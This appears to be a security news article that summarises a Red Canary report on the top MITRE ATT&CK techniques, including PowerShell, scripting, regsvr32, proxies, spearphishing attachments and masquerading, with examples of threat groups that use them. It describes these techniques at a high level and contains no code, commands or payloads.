Attackers can use PowerShell to direct the execution of a local script, retrieve and execute remote resources using various network protocols, encode payloads passed via the command line, or load PowerShell into other processes.
Adversaries known to leverage the technique in their attacks include Turla, which uses a post-infection executable to load malicious PowerShell scripts directly into memory. The Cobalt hackers too are known for the use of multiple instances of PowerShell in the later stages of their attacks.
A look at the top ten ATT&CK techniques by industry shows that PowerShell has been used in attacks across 15 verticals, including communication, education, energy, financial, government, health, and media industries. In all cases, it is either the most common or in top three most commonly used techniques.
“PowerShell is here to stay for administrators and adversaries alike, and those organizations that learn to defend against malicious uses of it will have a distinct advantage. Defending against PowerShell will require not just baselining and an understanding of changes in the ways adversaries use the tool, but defenders will also have to maintain intelligence related to a wide and changing variety of PowerShell attack tools,” Red Canary says.
Breakthroughs in methods for escaping script-host constrains on Windows and macOS, the report reveals, have created new opportunities for actors looking to leverage scripting as part of their malicious attacks. In addition to WScript and CScript, default scripting binaries on Windows systems, other applications can also execute scripts, including SXSL and WMIC, which expands the attack surface.
Chinese cyber-espionage group known as APT1 is known for the use of batch scripts in the early reconnaissance phase of their attacks, to gather system information, enumerate running services and processes, list accounts with administrative privileges, and gather other data. The Smoke Loader Trojan uses a Visual Basic script to ensure persistence.
Regsvr32.exe, a trusted component of the Windows platform, provides attackers with the means to execute native code or scripts, either by leveraging local resources or by loading them from a remote location. The state-sponsored espionage group Ocean Lotus and the espionage group APT19 are known for the use of regsvr32 in their attacks.
Used to direct network traffic between systems or act as intermediaries for network communications, connection proxies are used to obscure the identity or location of adversaries. Prominent examples of threat actors leveraging the technique include Duqu and APT10, both focused on espionage attacks.
Spearphishing attachment, the form of spearphishing that employs malware attached to an email, is a simple and effective technique that attackers can leverage for code execution. It allows for the use of multiple file types, thus providing the attackers with the flexibility of targeting the various applications that handle specific document types.
With virtually everyone having at least an email address, phishing provides attackers with a nearly unlimited array of potential targets. The technique relies on the victim’s trust to achieve its malicious intent, and there are also numerous tools available to prevent malicious attachments from reaching the victim’s inbox.
The technique, Red Canary points out, has been a particularly prolific tool among governments seeking to surveil supposed dissidents, as exemplified in Citizen Lab’s report last year on the targeting of Tibetan activists. The Leviathan (TEMP.Periscope) group has engaged in numerous attacks targeting defense contractors, universities with military research ties, law firms, and government agencies.
The Carbanak group too is believed to have leveraged spearphishing attachments as the initial infection vector in some of its attacks.
Masquerading, another prevalent MITRE ATT&CK technique, relies on manipulating the name or location of an executable to evade defensive technology or deceive potential victims. The $80 million heist from Bangladesh Bank leveraged the technique, as did the Calisto macOS Trojan that remained hidden for two years.
Credential Dumping, Registry Run Keys / Start Folder, Rundll32, and Service Execution rounded up top 10 techniques, Red Canary says. All these techniques, and tens others more, albeit used less, are here to stay, and they are also expected to evolve as attackers become more creative and discover new ways to leverage them.